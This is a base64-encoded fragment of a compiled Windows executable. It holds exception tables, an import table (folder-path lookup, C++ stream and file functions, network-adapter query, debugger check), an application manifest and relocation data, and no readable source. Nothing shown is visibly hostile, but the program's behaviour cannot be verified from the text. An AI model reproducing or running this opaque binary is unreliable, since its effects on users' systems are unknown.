AAAAAAAAAAAAAAEAAAD/////AH9AAAAAAAAMf0AAIgWTGQIAAABYnkAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAQAAAAAAAAAAAAAAA6k5AAAMAAAAEAAAABQAAAAEAAACMnkAAIgWTGQkAAADUnkAAAQAAAJyeQAAAAAAAAAAAAAAAAAABAAAA/////zB/QAAAAAAAO39AAAEAAABGf0AAAgAAAAAAAAADAAAAUX9AAAIAAAAAAAAAAgAAAFx/QAACAAAAZ39AAAIAAAByf0AA/////7B/QAAiBZMZAQAAAByfQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAD/////8H9AACIFkxkBAAAASJ9AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAP////8ggEAAAAAAACiAQAAiBZMZAgAAAHSfQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAD/////aIBAAAAAAABggEAAIgWTGQIAAACon0AAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAIgWTGQkAAAAAoEAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAA/////7iAQAAAAAAAsIBAAAEAAADagEAAAQAAAOKAQAADAAAA9YBAAAQAAAAXgUAABQAAADmBQAAEAAAAOYFAAAMAAAA5gUAA/////3CBQAD/////eIFAAP////+AgUAA/////4iBQAAiBZMZBAAAAEigQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAiBZMZBQAAALCgQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAD/////wIFAAAAAAADIgUAAAQAAANCBQAAAAAAA2IFAAAAAAADjgUAA/////xCCQAAiBZMZAQAAANigQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAiBZMZNQAAACihQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAD/////QIJAAAAAAABIgkAAAQAAAFOCQAACAAAAXoJAAAMAAABpgkAABAAAAHSCQAAFAAAAf4JAAAYAAACKgkAABwAAAJWCQAAIAAAAoIJAAAgAAACrgkAACgAAALaCQAALAAAAwYJAAAgAAAC2gkAADQAAAMGCQAAOAAAAzIJAAA0AAADMgkAACAAAAMyCQAARAAAA14JAABEAAADigkAAEwAAAO2CQAAUAAAA+IJAABMAAAD4gkAAEwAAAAODQAAXAAAADoNAABgAAAAZg0AAEwAAAA6DQAAaAAAAGYNAABMAAAAkg0AAHAAAAC+DQAAcAAAAOoNAABwAAABFg0AAHwAAAFCDQAAgAAAAW4NAACEAAABmg0AAIQAAAHGDQAAhAAAAfINAACQAAACHg0AAJQAAAJKDQAAmAAAAnYNAACUAAACdg0AAJAAAAJ2DQAAhAAAAnYNAACoAAACog0AAKwAAALODQAAsAAAAvoNAAC0AAADJg0A
ALgAAANSDQAAvAAAA34NAADAAAADng0AAKwAAAO+DQAAyAAAABYRAADMAAAAQhEAA/////0OEQAAiBZMZAQAAANCiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAA/v///wAAAADQ////AAAAAP7///+qc0AAvnNAAAAAAAD+////AAAAAMz///8AAAAA/v///wt1QAA0dUAAAAAAAP7///8AAAAA1P///wAAAAD+////AAAAAJF1QAAAAAAA/v///wAAAADQ////AAAAAP7///8AAAAA9nVAAAAAAAD+////AAAAAMz///8AAAAA/v///wAAAAAjd0AAAAAAAP7///8AAAAA2P///wAAAAD+////G3pAAC56QAAAAAAA2MJAAAAAAAD/////AAAAAAwAAADIcUAAAAAAAPTCQAAAAAAA/////wAAAAAMAAAA8B1AAAIAAADYo0AAvKNAAAAAAAAAEEAAAAAAAPSjQAD/////cIRAACIFkxkBAAAAEKRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAP////+ghEAA/////6iEQAABAAAAAAAAAAEAAAAAAAAA/////7CEQABAAAAAAAAAAAAAAADFHUAAAgAAAAIAAAADAAAAAQAAAGSkQAAiBZMZBQAAADykQAABAAAAdKRAAAAAAAAAAAAAAAAAAAEAAAD/////4IRAAP/////ohEAAAQAAAAAAAAABAAAAAAAAAP/////whEAAQAAAAAAAAAAAAAAAlBtAAAIAAAACAAAAAwAAAAEAAADUpEAAIgWTGQUAAACspEAAAQAAAOSkQAAAAAAAAAAAAAAAAAABAAAA/////wAAAAD/////AAAAAAEAAAAAAAAAAQAAAAAAAABAAAAAAAAAAAAAAADeGEAAQAAAAAAAAAAAAAAAVRhAAAIAAAACAAAAAwAAAAEAAAA8pUAAAAAAAAAAAAADAAAAAQAAAEylQAAiBZMZBAAAABylQAACAAAAXKVAAAAAAAAAAAAAAAAAAAEAAAD/////QIVAACIFkxkBAAAAqKVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAGioAAAAAAAAAAAAAISoAAAckgAAmKYAAAAAAAAAAAAAGLUAAEyQAAB4pwAAAAAAAAAAAABCtwAALJEAAEymAAAAAAAAAAAAAOa4AAAAkAAAVKYAAAAAAAAAAAAATLoAAAiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAANS4AAAAAAAABroAAPa5AADcuQAAyLkAAKq5AACOuQAAMroAAGa5AABWuQAARrkAADC5AAASuQAACrkAAPS4AAB6uQAAHLoAAAAAAABKqwAAdKsAAKirAADoqwAAFKwAADisAAB2rAAAkKwAAK6sAADWrAAA8KwAACytAABsrQAArq0AAPKtAAAyrgAAeK4AAL6uAAAIrwAARq8AAJKvAACorwAA5K8AADCwAABWsAAAkLAAANKwAAD+sAAAFrEAAEqxAACAsQAA6rEAACCyAABksgAAlrIAAMyyAAAOswAAZrMAAKCzAAAKtAAAQrQAAIi0AADStAAAzKgAAOyoAAAMqQAALqkAAHSpAACyqQAA8qkAADSqAACQqAAAdKoAAMSqAAAEqwAAAAAAAIC2AACItgAAkrYAAKC2AACwtgAAurYAAMS2AADQtgAA2rYAAOS2AADwtgAA+rYAAAS3AAAOtwAAFrcAACC3AAAwtwAAOrcAAFC3AABetwAAbrcAAHi3AACAtwAAjrcAAJa3AACitwAArrcAALy3AADStwAA5rcAAPK3AAD8twAADrgAACK4AAAsuAAAOrgAAEK4AABMuAAAYrgAAJi4AACyuAAAxLgAAHi2AABYtgAAPrYAACi2AAAStgAA6rUAAOC1AADWtQAAxrUAALa1AACutQAApLUAAIK1AABGtQAAJrUAAPS1AABitQAAAAAAAHCoAAAAAAAAvwBTSEdldEZvbGR
lclBhdGhBAABTSEVMTDMyLmRsbACnAj9jb3V0QHN0ZEBAM1Y/JGJhc2ljX29zdHJlYW1ARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAMUBBAACOAj9fWG91dF9vZl9yYW5nZUBzdGRAQFlBWFBCREBaAIwCP19YbGVuZ3RoX2Vycm9yQHN0ZEBAWUFYUEJEQFoADQY/dW5jYXVnaHRfZXhjZXB0aW9uQHN0ZEBAWUFfTlhaAMgFP3NwdXRuQD8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUFFX0pQQkRfSkBaAABTAj9fT3NmeEA/JGJhc2ljX29zdHJlYW1ARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBRQUVYWFoAAMUFP3NwdXRjQD8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUFFSERAWgCRAz9mbHVzaEA/JGJhc2ljX29zdHJlYW1ARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBRQUVBQVYxMkBYWgAIAT8/Nj8kYmFzaWNfb3N0cmVhbUBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRUFBVjAxQEhAWgAADwE/PzY/JGJhc2ljX29zdHJlYW1ARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBRQUVBQVYwMUBQNkFBQVYwMUBBQVYwMUBAWkBaAACcBT9zZXRzdGF0ZUA/JGJhc2ljX2lvc0BEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRVhIX05AWgAAawM/ZW5kbEBzdGRAQFlBQUFWPyRiYXNpY19vc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQDFAQUFWMjFAQFoAAJ4BP19EZWNyZWZAZmFjZXRAbG9jYWxlQHN0ZEBAUUFFUEFWMTIzQFhaANIBP19HZXRnbG9iYWxsb2NhbGVAbG9jYWxlQHN0ZEBAQ0FQQVZfTG9jaW1wQDEyQFhaAAD2AT9fSW5pdEA/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQElBRVhYWgAAkQI/YWx3YXlzX25vY29udkBjb2RlY3Z0X2Jhc2VAc3RkQEBRQkVfTlhaAADzAT9fSW5jcmVmQGZhY2V0QGxvY2FsZUBzdGRAQFFBRVhYWgCwAT9fR2V0Y2F0QD8kY29kZWN2dEBEREhAc3RkQEBTQUlQQVBCVmZhY2V0QGxvY2FsZUAyQFBCVjQyQEBaAJ4APz8xX0xvY2tpdEBzdGRAQFFBRUBYWgAA7wE/X0lkX2NudEBpZEBsb2NhbGVAc3RkQEAwSEEA/wM/aWRAPyRjb2RlY3Z0QERESEBzdGRAQDJWMGxvY2FsZUAyQEEAAGAAPz8wX0xvY2tpdEBzdGRAQFFBRUBIQFoAgQA/PzE/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFVBRUBYWgAANwI/X0xvY2tAPyRiYXNpY19zdHJlYW1idWZARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBVQUVYWFoAAIICP19VbmxvY2tAPyRiYXNpY19zdHJlYW1idWZARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBVQUVYWFoAAKwFP3Nob3dtYW55Y0A/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQE1BRV9KWFoACgY/dWZsb3dAPyRiYXNpY19zdHJlYW1idWZARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBNQUVIWFoAADUGP3hzZ2V0bkA/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl9
0cmFpdHNAREBzdGRAQEBzdGRAQE1BRV9KUEFEX0pAWgA4Bj94c3B1dG5APyRiYXNpY19zdHJlYW1idWZARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBNQUVfSlBCRF9KQFoAjAU/c2V0YnVmQD8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBATUFFUEFWMTJAUEFEX0pAWgDnBT9zeW5jQD8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBATUFFSFhaACwEP2ltYnVlQD8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBATUFFWEFCVmxvY2FsZUAyQEBaAACaAT9fQkFET0ZGQHN0ZEBAM19KQgAAJgA/PzA/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQElBRUBYWgAA7AM/Z2V0bG9jQD8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUJFP0FWbG9jYWxlQDJAWFoAAKgBP19GaW9wZW5Ac3RkQEBZQVBBVV9pb2J1ZkBAUEJESEhAWgAAeAA/PzE/JGJhc2ljX2lvc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAVUFFQFhaAFkCP19QbmluY0A/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQElBRVBBRFhaACkCP19Jb3NfYmFzZV9kdG9yQGlvc19iYXNlQHN0ZEBAQ0FYUEFWMTJAQFoAYAE/P183aW9zX2Jhc2VAc3RkQEA2QkAAPAE/P183PyRiYXNpY19pb3NARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEA2QkAAAHUAPz8xPyRiYXNpY19pb3NARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBVQUVAWFoAAAoAPz8wPyRiYXNpY19pb3N0cmVhbUBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRUBQQVY/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEAxQEBaAAAwBD9pbkA/JGNvZGVjdnRARERIQHN0ZEBAUUJFSEFBSFBCRDFBQVBCRFBBRDNBQVBBREBaAACRBT9zZXRnQD8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBASUFFWFBBRDAwQFoAABUGP3Vuc2hpZnRAPyRjb2RlY3Z0QERESEBzdGRAQFFCRUhBQUhQQUQxQUFQQURAWgAA5gQ/b3V0QD8kY29kZWN2dEBEREhAc3RkQEBRQkVIQUFIUEJEMUFBUEJEUEFEM0FBUEFEQFoA1gA/PzU/JGJhc2ljX2lzdHJlYW1ARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBRQUVBQVYwMUBBQUlAWgAAEQE/PzY/JGJhc2ljX29zdHJlYW1ARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBRQUVBQVYwMUBQNkFBQVZpb3NfYmFzZUAxQEFBVjIxQEBaQFoAAHsAPz8xPyRiYXNpY19pc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAVUFFQFhaAAARAD8/MD8kYmFzaWNfaXN0cmVhbUBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRUBQQVY/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEAxQF9OQFoAQgE/P183PyRiYXNpY19pc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN
0ZEBAQHN0ZEBANkJAAABRBT9yZWFkQD8kYmFzaWNfaXN0cmVhbUBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRUFBVjEyQFBBRF9KQFoA7gU/dGVsbGdAPyRiYXNpY19pc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUFFP0FWPyRmcG9zQEhAMkBYWgB1BT9zZWVrZ0A/JGJhc2ljX2lzdHJlYW1ARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBRQUVBQVYxMkBfSkhAWgAATVNWQ1AxMDAuZGxsAAANAT93aGF0QGV4Y2VwdGlvbkBzdGRAQFVCRVBCRFhaAF0APz8xZXhjZXB0aW9uQHN0ZEBAVUFFQFhaAAAiAD8/MGV4Y2VwdGlvbkBzdGRAQFFBRUBBQlFCREBaACQAPz8wZXhjZXB0aW9uQHN0ZEBAUUFFQEFCVjAxQEBaAADRBW1lbW1vdmUAZgVhdG9pAABlAD8/M0BZQVhQQVhAWgAAYwA/PzJAWUFQQVhJQFoAAM8FbWVtY3B5AADNBW1lbWNocgAA0wVtZW1zZXQAABUAPz8wYmFkX2Nhc3RAc3RkQEBRQUVAUEJEQFoAADoBX19DeHhGcmFtZUhhbmRsZXIzAAAhAV9DeHhUaHJvd0V4Y2VwdGlvbgAAWQA/PzFiYWRfY2FzdEBzdGRAQFVBRUBYWgAUAD8/MGJhZF9jYXN0QHN0ZEBAUUFFQEFCVjAxQEBaAHoFZmdldGMAhQVmcHV0YwAfBnVuZ2V0YwAAJANfbG9ja19maWxlAACOBF91bmxvY2tfZmlsZQAAeQVmZmx1c2gAAOsFc2V0dmJ1ZgDQBW1lbWNweV9zAACWBWZ3cml0ZQAAewVmZ2V0cG9zAFkCX2ZzZWVraTY0AJIFZnNldHBvcwB2BWZjbG9zZQAAwANfbWtkaXIAAIsFZnJlZQAAxAVtYWxsb2MAAHoAPz9fVkBZQVhQQVhAWgDvBXNwcmludGYAZwVhdG9sAABNU1ZDUjEwMC5kbGwAAMUBX2Ftc2dfZXhpdAAAYwFfX2dldG1haW5hcmdzANwBX2NleGl0AAAqAl9leGl0AC0BX1hjcHRGaWx0ZXIAcwVleGl0AABkAV9faW5pdGVudgCwAl9pbml0dGVybQCxAl9pbml0dGVybV9lAOwBX2NvbmZpZ3RocmVhZGxvY2FsZQCiAV9fc2V0dXNlcm1hdGhlcnIAAOsBX2NvbW1vZGUAAEUCX2Ztb2RlAACfAV9fc2V0X2FwcF90eXBlAAACAT90ZXJtaW5hdGVAQFlBWFhaAI0EX3VubG9jawBbAV9fZGxsb25leGl0ACMDX2xvY2sAyQNfb25leGl0APsBX2NydF9kZWJ1Z2dlcl9ob29rAADuAD9fdHlwZV9pbmZvX2R0b3JfaW50ZXJuYWxfbWV0aG9kQHR5cGVfaW5mb0BAUUFFWFhaAAAhAl9leGNlcHRfaGFuZGxlcjRfY29tbW9uALgCX2ludm9rZV93YXRzb24AAO8BX2NvbnRyb2xmcF9zAAA/AEdldEFkYXB0ZXJzSW5mbwBJUEhMUEFQSS5ETEwAAOwCSW50ZXJsb2NrZWRFeGNoYW5nZQCyBFNsZWVwAOkCSW50ZXJsb2NrZWRDb21wYXJlRXhjaGFuZ2UAANMCSGVhcFNldEluZm9ybWF0aW9uAADqAEVuY29kZVBvaW50ZXIAygBEZWNvZGVQb2ludGVyAMAEVGVybWluYXRlUHJvY2VzcwAAwAFHZXRDdXJyZW50UHJvY2VzcwDTBFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAApQRTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAANJc0RlYnVnZ2VyUHJlc2VudACnA1F1ZXJ5UGVyZm9ybWFuY2VDb3VudGVyAJMCR2V0VGlja0NvdW50AADFAUdldEN1cnJ
lbnRUaHJlYWRJZAAAwQFHZXRDdXJyZW50UHJvY2Vzc0lkAHkCR2V0U3lzdGVtVGltZUFzRmlsZVRpbWUAS0VSTkVMMzIuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALiTQAAAAAAALj9BVmJhZF9jYXN0QHN0ZEBAAAAAAAAAuJNAAAAAAAAuP0FWPyRiYXNpY19zdHJpbmdidWZARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBWPyRhbGxvY2F0b3JAREAyQEBzdGRAQAAAAAC4k0AAAAAAAC4/QVY/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQAC4k0AAAAAAAC4/QVY/JGJhc2ljX2ZpbGVidWZARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEAAAAC4k0AAAAAAAC4/QVY/JGJhc2ljX3N0cmluZ3N0cmVhbUBEVT8kY2hhcl90cmFpdHNAREBzdGRAQFY/JGFsbG9jYXRvckBEQDJAQHN0ZEBAALiTQAAAAAAALj9BVj8kYmFzaWNfaW9zdHJlYW1ARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEAAALiTQAAAAAAALj9BVj8kYmFzaWNfaXN0cmVhbUBEVT8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+6z5XP9Y/5T8AMAAAoAAAAFAwXzCKMNswCjGWMdYx5TF1MrgyJjM4MzY0RTS2NMo0QjV8NY82pDb4Nl03eDeNN9c3PzifOLY4vzjyOAw5FzkxOUY5VDlrObI51jnkOfs5Qjp2Oog65TryOvw6ITtCO0g7Ujt9O407vDsGPBc8RDx5PIg8lDzGPNg8/jyOPQA+JT4yPkQ+Vj5oPno+uz78PoE/xj/YPwAAAEAAAHQAAACMMKEwtjDNMHAy4DKWM7401jTnNAg1DjUXNTI1PjVQNV41ajV3Na811jXmNQM2FjZXNmM2jDaUNp02wzbLNtQ2BjcYNxg4Kzg/OFc4/zgaOXg5izmfObc53TkHOjQ9OD6hPvI+Rz9+P+M/AAAAUAAAXAAAAGkybzKIMo4y/DI0M0UzoTOnM/Y0BTVnNng2hjbXNuw2+jZHN1g3Zje2N8U3djiFOK841jgzOdY55Tk+OiY7ODulOz483D02PkU+az6FPpk+rD4AAABgAABMAAAABjAVMEMwsTBKMU8xRjJTMqYyuDJrOMA4IzosOjM6ZTojPTU9Pz1JPVM9XT1nPXs9jz2jPbQ9xT0fPrU+5T7EP/Q/AAAAcAAAoAEAAOcwCzEcMSUxNTFGMVcxaDF0MXoxgDGGMYwxkjGYMZ4xpDG1McQxyjHQMeQxIjInMjEyODI+MkMySDJNMlIyWDJgMnQygTKOMqIyqzLGMtAy4zLtMvIy9zIZMx4zJzMsMzkzSjNQM1czazNwM3YzfjOEM4ozlzOdM6YzxTPNM9Yz3DPkM/AzAjQNNBM
0JTQtNDg0RDRKNFM0WTReNGM0aDRvNHU0hzSPNJU0oTSsNMA0xjTMNNI02DTeNOQ06zRJNaw1XDaONpk2nzayNsc20jboNgA3CjdPN1U3WzdhN2c3bTd0N3s3gjeJN5A3lzeeN6Y3rje2N8I3yzfQN9Y34DfpN/Q3ADgFOBU4GjggOCY4PDhDOIw4kjicOKQ4qTjKOM847jiYOZ05rznNOeE55zlOOlQ6YTp+Oss60DoSOzU7QjtOO1Y7XjtqO5M7mzumO6w7sju4O747xDvKO9A71jvcO+U7+zsqPEg8XjyUPLI85Dz1PAs9UT1ePWo9iT2SPbU9CD6OPrg+xT7OPu8+CD8RPyc/nD/bPwCAAAAwAAAACjBMMJ0w4zBgMawxBzIqMvAzOjRINF40ijTKNAo1MjVwNXo1hjUAAACQAADsAQAAKDIsMjgyPDJsMnAydDKIMowykDKUMpgynDKgMqQyqDKsMrAytDK4MrwywDLEMsgyzDLQMtQy2DLcMuAy5DLoMuwy8DL0Mvgy/DIAMwQzCDMMM0AzRDO0M7gzvDPAM6Q1qDUgNiQ2NDY4Njw2RDZcNmA2eDaINow2oDakNrQ2uDa8NsQ23DbsNvA2ADcENwg3DDcQNxQ3GDccNyA3JDcoNzA3SDdMN2Q3dDd4N3w3gDeEN4g3jDeQN5Q3mDegN7g3yDfMN9A31DfYN+A3+DcIOAw4EDgUOBw4NDg4OFA4YDhkOGg4cDiIOJg4nDikOLw4wDjYONw49Dj4OBA5IDkkOSg5LDkwOTg5UDlgOWQ5dDl4OXw5gDmEOYg5kDmoObg5vDnMOdA52DnwOQA6BDoUOhg6HDokOjw6TDpQOlg6cDoMOxQ7HDsoO0g7TDtUO2g7cDt8O5w7qDvIO9Q7/DsgPCw8NDxMPFg8eDyEPKg8yDzQPNg84DzoPPA8+DwAPRA9JD0wPTg9UD1YPWg9cD2IPZw9qD2wPcg92D3gPeg98D34PQA+CD4YPiA+KD4wPjw+XD5kPnA+mD6sPrg+wD7YPuA+6D74Pgg/ED8YPyA/LD9MP1g/eD+AP4w/rD+0P8A/5D8AAACgAAD4AAAABDAMMBQwHDAkMCwwNDA8MEQwTDBUMFwwZDBwMJQwtDC8MMQwzDDUMNww6DAMMSwxNDE8MUQxTDFUMVwxZDFsMXQxfDGEMYwxlDGcMaQxrDG0MbwxxDHMMdQx3DHkMewx9DH8MQQyDDIUMhwyJDIsMjQyPDJEMkwyVDJcMmQybDJ0MnwyhDKMMpQynDKkMqwytDK8MsQyzDLUMuAyFDMYMzQzODNYM3gzmDO0M7gzwDPUM9wz8DP4M/wzBDQMNBQ0IDRANEg0YDRwNIQ0kDSYNLA0uDTQNOA09DQANQg1SDVYNWw1gDWMNZQ1rDW4NQAAAMAAACgAAAAAMCAwcDCsMOgwODF0MbAx6DEEMiAyXDKYMtgy9DIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
